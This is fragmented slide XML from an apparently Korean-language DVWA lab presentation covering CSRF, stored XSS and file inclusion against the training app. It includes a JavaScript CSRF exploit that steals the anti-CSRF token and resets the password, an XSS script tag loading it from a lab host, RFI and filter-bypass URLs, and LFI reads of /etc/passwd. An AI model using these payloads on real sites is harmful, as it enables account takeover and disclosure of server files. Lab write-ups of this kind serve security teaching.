              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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문자가 아니라면 해당 요청을 거부하는 것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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5143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코드</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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0D8B4170-1540-40FB-9C44-67CCFB5B23D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2514524"/>
            <a:ext cx="5736954" cy="69977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var xhr;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var dvwa_csrf_url = '/dvwa/vulnerabilities/csrf/';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req1();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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//dvwa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의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csrf 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메뉴 누를때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user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토큰을 알아내기 위해서 첫번째 요청을 보내는 함수이다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function req1() { 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xhr = new XMLHttpRequest();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//XMLHttpRequest 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객체를 생성</a:t>
            </a:r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xhr.onreadystatechange = req2;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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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서버로 보낸 요청에 대한 응답을 받았을때 어떤 동작을 할 것인지를 정한다</a:t>
            </a:r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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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응답을 받은후에는 </a:t>
            </a:r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req2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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에 짜여진 대로 동작한다</a:t>
            </a:r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xhr.open('GET', dvwa_csrf_url);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xhr.send();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서버로 부터 응답을 받은 후의 동작을 결정 한 후에는 실질적으로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request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하는것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요청을 하기 위해서는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request class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의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open()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과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send() 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호출해야한다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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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function req2() {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if (xhr.readyState === 4 &amp;&amp; xhr.status === 200) {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//readyState 4, status 200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은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complete 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으로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request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에 대한 처리가 끝났으며 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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응답할 준비가 완료된 것을 의미</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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var htmltext = xhr.responseText;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var parser = new DOMParser();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var htmldoc = parser.parseFromString(htmltext,'text/html');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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var CSRFtoken = htmldoc.getElementsByName("user_token")[0].value;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첫번재 요청을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htmldoc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으로 변환하여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user_token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값을 추출한다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alert('Found the token: ' + CSRFtoken);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추출한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token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값을 화면에 뿌려준다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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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xhr = new XMLHttpRequest();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xhr.open('GET', dvwa_csrf_url + '?password_new=hacker&amp;password_conf=hacker&amp;Change=Change&amp;user_token=' + CSRFtoken);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xhr.send();</a:t>
            </a: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알아낸 토큰으로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get request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하여 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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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요청을 해서 패스워드 변경을 시도한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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0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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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602486D1-8BC1-4E19-B196-96E713117B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493335" y="2172954"/>
            <a:ext cx="5568404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 vim /opt/lampp/htdoc/csrfhigh.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11606070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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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5D1F7E97-176A-44BC-BC79-233A544EBE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="2339325"/>
            <a:ext cx="6614220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1) Security Level : Low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 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XSS(Stored)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다음 스크립트 작성</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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F992FC9D-37D9-4EFE-BAE0-66B5387172B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="6166190"/>
            <a:ext cx="6614220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2) Security Level : High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설정 후 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XSS(Stored)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들어가면 창 확인 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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FEA39F35-7551-468C-BE56-BAB77EB7B6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878502" y="2629582"/>
            <a:ext cx="5390913" cy="26347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&lt;script src="http://192.168.80.11/csrfhigh.js&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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4F1B5BE-3FD9-4B49-B9AC-495200E9CAAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728617" y="2839723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※ F12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눌러서 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maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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변경 후 작성</a:t>
            </a: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F357330-D117-4E36-A155-BEEB0A6B2E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="878501" y="3195404"/>
            <a:ext cx="5296961" cy="2763435"/>
            <a:chOff x="878501" y="3195404"/>
            <a:chExt cx="5296961" cy="2763435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C95135A-A869-4A30-B155-98D8A8B4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501" y="3195404"/>
              <a:ext cx="5296961" cy="2763435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FD201165-F4EA-47B7-AA7F-9BDA9087D9C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2484120" y="5334000"/>
              <a:ext cx="533400" cy="1524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B4E2DAC-C5CE-4EDE-BD10-2A4C450B6BFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2446020" y="4268015"/>
              <a:ext cx="3040380" cy="59354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604A23B3-1D8A-48D7-B64E-E8D366FA2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8" b="35139"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="878501" y="6491381"/>
            <a:ext cx="5296961" cy="28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929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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1F7E97-176A-44BC-BC79-233A544EBE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="2339325"/>
            <a:ext cx="6614220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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격성공</a:t>
            </a:r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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="14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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F1B5BE-3FD9-4B49-B9AC-495200E9CAAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728617" y="2521669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※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공격성공</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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패스워드가 변경 됐음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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89CE57-9D37-473B-AF9D-352BF951A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99" y="2971785"/>
            <a:ext cx="6202681" cy="80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4372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Impossible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소스코드 분석</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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498DAB71-B23C-4FEC-B9DB-D97396CD6D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2278304"/>
            <a:ext cx="5736954" cy="69977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 isset( $_GET[ 'Change' ] ) ) {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Check Anti-CSRF token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checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );</a:t>
            </a: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Get input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en-US" altLang="ko-KR" sz="130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$pass_curr = $_GET[ 'password_current' ];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$pass_new  = $_GET[ 'password_new' ];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$pass_conf = $_GET[ 'password_conf' ];</a:t>
            </a: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$pass_curr = stripslashes( $pass_curr );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stripslashes() : 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백슬래쉬 제거해주는 함수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));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//db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 열결되어 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isset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값이 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true, is_object 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값이 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true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면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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특수문자를 회피한 암호를 반환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아닐 시 에려</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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$pass_curr = md5( $pass_curr );</a:t>
            </a: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현재 암호가 맞는 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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$data = $db-&gt;prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );</a:t>
            </a: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$data-&gt;bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 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현재 로그인된 유저에 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:user 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바인딩</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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$data-&gt;bindParam( ':password', $pass_curr, PDO::PARAM_STR ); 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//password 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변수에 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:password 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바인딩</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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3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$data-&gt;execute();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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쿼리문 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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3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95457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Impossible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소스코드 분석 </a:t>
            </a:r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계속</a:t>
            </a:r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498DAB71-B23C-4FEC-B9DB-D97396CD6D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2278304"/>
            <a:ext cx="5736954" cy="6997775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if( ( $pass_new == $pass_conf ) &amp;&amp; ( $data-&gt;rowCount() == 1 ) ) {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새 패스워드와 확인이 같고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data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변수의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row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이면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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$pass_new = stripslashes( $pass_new );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$pass_new = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));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$pass_new = md5( $pass_new );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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DB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에 새 암호 업데이트</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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PDO(PHP Data Objects)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는 같은 방법으로 여러 데이터베이스에 접근할 수 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="110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// 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있게 해주는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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확장 모듈</a:t>
            </a:r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$data = $db-&gt;prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );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$data-&gt;bindParam( ':password', $pass_new, PDO::PARAM_STR );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$data-&gt;bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );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$data-&gt;execute();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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// Feedback for the user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echo "&lt;pre&gt;Password Changed.&lt;/pre&gt;";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}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else {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// Issue with passwords matching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echo "&lt;pre&gt;Passwords did not match or current password incorrect.&lt;/pre&gt;";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}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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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Generate Anti-CSRF token</a:t>
            </a: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generateSessionToken();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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1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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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646433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99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Impossible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3-3) CSRF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AE7652E3-72C8-4708-82AE-86B83F706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6180" y="1897381"/>
            <a:ext cx="6131616" cy="419102"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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b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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1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AB603FF2-1FA7-4F9B-82D5-2EB0470C793B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2310769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비밀번호를 입력하여야만 비밀번호 수정이 가능하다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10" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610168D7-79AA-4CB9-8256-148C00CA43D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520005" y="3468354"/>
            <a:ext cx="5949404" cy="4239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CSRF 공격을 막기위한 user_token과 현재 비밀번호까지 알아야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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE497A67-61C2-4D01-82ED-C62E96129211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2694906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비밀번호 등과 같이 회원 정보를 수정할 때는 반드시 이와 같은 장치를</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="160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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CE38F4-8FC7-43E0-81F7-05428DE092AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2988202"/>
            <a:ext cx="5949405" cy="424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마련하여야 안전하다</a:t>
            </a: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1A68F51C-0FE4-4F88-A121-099842E15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46194"/>
            <a:ext cx="7072770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Nanum Myeongjo"/>
              </a:rPr>
              <a:t>CSRF 공격을 막기위한 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  <a:ea typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>user_token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ea typeface="Nanum Myeongjo"/>
              </a:rPr>
              <a:t>과 현재 비밀번호까지 알아야 하므로 CSRF 공격은 불가능</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-K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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED6FC88-CF67-4450-A1B6-884F72805B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596205" y="3770312"/>
            <a:ext cx="5568404" cy="4239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600">
                <a:latin typeface="나눔스퀘어_ac" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac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ko-KR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CSRF 공격은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF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불가능 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211514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045200"/>
            <a:ext cx="5913238" cy="31877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위의 명령어까지 전부 했다면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https://google.com/recaptcha/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접속한다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아이콘을 클릭해서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Admin Console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구글 계정으로 로그인을 완료한 후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config.inc.php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파일을 텍스트 편집기로 열고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27 … = ‘ ’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28 … = ‘ ‘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부분에 차례로 사이트 맵 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 키를 입력한다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DVWA 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설치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927100"/>
            <a:ext cx="5913238" cy="48701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console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cd /var/www/html/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vi php.ini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allow_url_fopen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= on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allow_url_include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= on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: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wq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vi config/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config.inc.php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: set nu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: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wq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26482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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903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File Inclusion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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161984" y="3309457"/>
            <a:ext cx="2193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3-4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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3982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개요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1879600"/>
            <a:ext cx="5913238" cy="735330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Inclusion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타입의 취약점은 공격자가 제어하는 변수를 사용하여 실행 코드에 대한 경로를 빌드할 수 있게 하는 공격이다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취약점을 통해 웹페이지에서 내가 원하는 페이지를 띄워 서버내에 타격을 줄 수 있는 구문을 가진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경로를 내가 원하는 대로 변경해 서버내의 중요한 파일을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입력문을 적절한 검증 혹은 필터링 없이 사용할 때 발생하는 취약점이다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LFI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RFI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나뉜다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LFI(Local File Inclusion) :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서버에 있는 로컬 파일을 실행 및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들여다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보는 것이다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RFI(Remote File Inclusion) :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외부에 있는 원격 파일 및 웹 페이지를 실행시키는 것이다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4908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목표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PC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환경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1879600"/>
            <a:ext cx="5913238" cy="735330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PC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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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운영체제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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kali-linux-2020.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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2.apche2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 되어있음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3.mysql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 되어있음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4.XAMPP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설치함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/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9910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방화벽 설정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3927787"/>
            <a:ext cx="5913238" cy="5305113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kali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linux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방화벽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꺼져있음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B98A08F-849E-4761-ADDC-9D2D3ED54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0" y="1814515"/>
            <a:ext cx="6034441" cy="200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30286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난이도 변경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698938"/>
            <a:ext cx="5913238" cy="2533961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Security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Impossible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Low,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Midium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보안단계를 바꿀 수 있고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바꾼 다음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클릭하면 저장됨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5295A1D-D9A0-4D66-A5BF-D79B18C9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0" y="1796331"/>
            <a:ext cx="6001783" cy="46944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05EB766-7D71-42D2-B870-735D3AA8AAC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989351" y="6016887"/>
            <a:ext cx="1109272" cy="1740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66BEC5-7D36-4075-AA2E-C3C738672B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308269" y="5175858"/>
            <a:ext cx="1229410" cy="280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2897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5.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696264"/>
            <a:ext cx="5913238" cy="353663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 Inclusion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1D40326-56E1-476D-8E6F-C2283417E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8" r="15423" b="40105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="1755125"/>
            <a:ext cx="6078391" cy="331154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69EFC7-563E-44DA-A79D-94EF20F68A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="4455634"/>
            <a:ext cx="1162267" cy="176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6135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91765"/>
            <a:ext cx="5913238" cy="394113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 Inclusion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소스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일 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925825CD-E3EE-46DD-A445-8CEFFE6F58CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1824540"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’); 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8862567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696264"/>
            <a:ext cx="5913238" cy="353663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주소창에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page=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http://www.google.com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을 쓰면 구글 검색창이 나옴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위험한 실행구문이 포함된 외부 사이트의 주소를 입력 하면 서버에서 그 구문들이 실행되게 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.)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공격은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RFI(Remote File Inclusion)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불리는 공격 기법이다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F054EC7-0F4E-4C3A-9089-A2BD85CD16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9" r="14902" b="42600"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="419266" y="1879600"/>
            <a:ext cx="5954893" cy="34102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3F7306-1F3F-4B5C-9BF3-F3B51BD761D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146217" y="2182344"/>
            <a:ext cx="3230911" cy="18610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62141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696264"/>
            <a:ext cx="5913238" cy="353663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주소창에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page=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../../../../../../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etc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/passwd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etc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/passwd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를 쓰면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passwd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파일의 내용이 나옴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파일의 주소를 절대경로나 상대경로로 쓰면 해당 파일의 내용을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.)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공격은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LFI(Remote File Inclusion)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불리는 공격 기법이다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15231" y="16281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D9A17AD-B9BF-451C-85FF-2C53C0484B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6" r="13966" b="62008"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358302" y="1676401"/>
            <a:ext cx="6192595" cy="208278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6C70043-2535-4285-A039-D624C020A33C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019331" y="1957272"/>
            <a:ext cx="3342807" cy="1763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8373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2" y="67259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Meduim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031841"/>
            <a:ext cx="5913238" cy="420106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 Inclusion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소스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일 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주소를 그대로 쓰면 안 먹히고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../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이용한 상대경로로 파일 찾는 건 불가능 해짐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125CA44-A13B-427C-8D32-7E3FEF881D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1747016"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’);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//http://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없애버리고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상대 경로로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못가도록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막음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str=replace(array(“http://”, “https://”), “”, $file); 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str_replace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(array(“../”, “..\”), $file);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444932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045200"/>
            <a:ext cx="5913238" cy="31877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가지의 파일 및 디렉터리의 권한을 수정해준다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/var/www/html/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/config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/var/www/html/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/hackable/uploads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/var/www/html/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/external/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phpids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/0.6/lib/IDS/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tmp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/phpids_log.txt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DVWA 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설치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927100"/>
            <a:ext cx="5913238" cy="487019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console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chmod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777 /var/www/html/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/config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chmod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777 /var/www/html/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/hackable/uploads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chmod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777 /var/www/html/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/external/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phpids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/0.6/lib/IDS/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tmp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/phpids_log.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371905501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Meduim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696264"/>
            <a:ext cx="5913238" cy="353663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 단계에서 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http://www.google.com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쓰면 앞의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http://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를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지워버리기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때문에 웹 페이지에 접속이 불가능하다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httphttp://://www.google.com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쓰면 중간의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http://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가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지워지면서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http://www.google.com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되면서 뚫린다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15231" y="16281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464C7CA-D05C-4D66-A398-DBBB504D1F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6" r="15249" b="31527"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="450032" y="1676402"/>
            <a:ext cx="6039421" cy="32765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6D5EBE0-E7C2-4DBE-B1D6-79DD57C1AE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831425" y="1985475"/>
            <a:ext cx="3815526" cy="2030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740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Meduim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696264"/>
            <a:ext cx="5913238" cy="353663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주소창에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page=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../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막아둬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상대경로는 못쓰게 변경함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절대경로를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막아두진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않아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etc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/passwd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하면 뚫린다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15231" y="16281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F336A-4365-4223-B4B6-C79F7E8E1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-1" r="15185" b="74983"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415231" y="1789114"/>
            <a:ext cx="5970387" cy="137486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0F03F3E-2016-4BAE-A5E0-34DD0543079F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921365" y="2045435"/>
            <a:ext cx="2871146" cy="2480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10783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91765"/>
            <a:ext cx="5913238" cy="394113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 Inclusion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소스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일 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주소는 통과할 수 없고 이름이 파일이거나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include.php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파일만 통과할 수 있게 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42A8FF2B-6379-47AA-ACA0-295E9ECC2F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426689" y="1798254"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’);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앞에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file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이 붙거나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include.php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면 통과함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if(!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fnmatch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(“file*”, $file) &amp;&amp; $file != “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include.php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”){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echo “ERROR: File not found!”;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exit;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2035676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4216400"/>
